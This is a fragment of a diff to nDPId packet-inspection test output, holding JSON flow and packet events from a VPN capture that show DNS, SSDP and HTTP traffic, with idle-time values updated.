00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1569687267865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1569687267865,"pkt":"NDY7z3UoLH6BsEqhCABFAADYAABAADoRnpxLS0tLCgAA4wA14toAxJ5uzl6BgAABAAcAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQABwAwABQABAAAAzQAUB291dGxvb2sJb2ZmaWNlMzY1wBjALQAFAAEAAABWABkHb3V0bG9vawdtcy1hY2RjBm9mZmljZcAYwE0ABQABAAAHZQAKB3NqYy1lZnrAVcByAAEAAQAAADAABChh3iLAcgABAAEAAAAwAAQ0YAOCwHIAAQABAAAAMAAEKGHdcsByAAEAAQAAADAABDRgEgI="} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1569687267991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687267991,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKY+gAAAERWl4KAADj7\/\/\/+u+QB2wAtlB4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} 00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1569687268077,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687268077,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA45bY75ACCk+7SFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjggR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} 00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1569687268376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687268376,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj5RAAEARlIwKAACXCgAA4wds75ABPzXfSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -274,16 +274,16 @@ 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1569687269223,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687269223,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj6FAAEARlH8KAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1569687269559,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687269559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKtRAAAAERCTYKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269562,"flow_last_seen":1569687269562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269562,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269562,"flow_last_seen":1569687269562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269562,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} 